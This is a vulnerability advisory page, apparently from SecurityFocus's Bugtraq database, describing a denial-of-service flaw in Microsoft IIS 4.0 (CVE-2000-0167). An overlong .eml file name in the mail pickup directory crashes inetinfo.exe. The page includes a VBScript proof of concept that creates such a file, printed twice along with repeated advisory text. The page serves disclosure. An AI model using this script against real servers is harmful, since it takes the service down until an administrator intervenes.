Microsoft IIS 4.0 Pickup Directory DoS Vulnerability
BID:1819
Info
Microsoft IIS 4.0 Pickup Directory DoS Vulnerability
| Bugtraq ID: | 1819 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: |
CVE-2000-0167 |
| Remote: | Yes |
| Local: | Yes |
| Published: | Feb 15 2000 12:00AM |
| Updated: | Jul 11 2009 03:56AM |
| Credit: | Posted to NTBugtraq on February 15, 2000 by Valentijn <[email protected]>. |
| Vulnerable: |
Microsoft IIS 4.0 |
| Not Vulnerable: | |
Discussion
Microsoft IIS 4.0 Pickup Directory DoS Vulnerability
An email with a filename consisting of over 86 characters and an extension of .txt.eml will cause Microsoft IIS to crash if placed in the \mailroot\pickup directory. The process inetinfo.exe will crash, resulting in a Dr. Watson access violation error. Restarting IIS is required in order to regain normal functionality.
An email with a filename consisting of over 86 characters and an extension of .txt.eml will cause Microsoft IIS to crash if placed in the \mailroot\pickup directory. The process inetinfo.exe will crash, resulting in a Dr. Watson access violation error. Restarting IIS is required in order to regain normal functionality.
Exploit / POC
Microsoft IIS 4.0 Pickup Directory DoS Vulnerability
Valentijn <[email protected]> has provided the following sample script:
<example script>
' PLEASE PROVIDE YOUR PICKUP PATH HERE
Rootpath = "c:\inetpub\mailroot\pickup\"
Set fso = createobject("scripting.filesystemobject")
Thename = Createkey & fso.GetTempName & ".eml"
Set Thefile = fso.GetFolder(rootpath).CreateTextFile(TheName)
Thefile.writeline "X-Sender: [email protected]"
Thefile.writeline "X-Receiver: [email protected]"
Thefile.writeline "From: <[email protected]>"
Thefile.writeline "To: <[email protected]>"
Thefile.writeline "Subject: MINE DID NOT CRASH"
Thefile.writeline "Date: " & now()
Thefile.writeline "X-Generator: " & Thename
Thefile.close
Set thefile = nothing
Thename = ""
Function Createkey
for z = 1 to 80
randomize
a = Int((25 * Rnd) + 1)
password = password & chr(a+65)
next
Createkey = password
end function
' Warning IF InetInfo.exe crashes it cannot be started again as long as the
file is still there!
</example script>
Valentijn <[email protected]> has provided the following sample script:
<example script>
' PLEASE PROVIDE YOUR PICKUP PATH HERE
Rootpath = "c:\inetpub\mailroot\pickup\"
Set fso = createobject("scripting.filesystemobject")
Thename = Createkey & fso.GetTempName & ".eml"
Set Thefile = fso.GetFolder(rootpath).CreateTextFile(TheName)
Thefile.writeline "X-Sender: [email protected]"
Thefile.writeline "X-Receiver: [email protected]"
Thefile.writeline "From: <[email protected]>"
Thefile.writeline "To: <[email protected]>"
Thefile.writeline "Subject: MINE DID NOT CRASH"
Thefile.writeline "Date: " & now()
Thefile.writeline "X-Generator: " & Thename
Thefile.close
Set thefile = nothing
Thename = ""
Function Createkey
for z = 1 to 80
randomize
a = Int((25 * Rnd) + 1)
password = password & chr(a+65)
next
Createkey = password
end function
' Warning IF InetInfo.exe crashes it cannot be started again as long as the
file is still there!
</example script>
Solution / Fix
Microsoft IIS 4.0 Pickup Directory DoS Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
Microsoft IIS 4.0 Pickup Directory DoS Vulnerability
References:
References: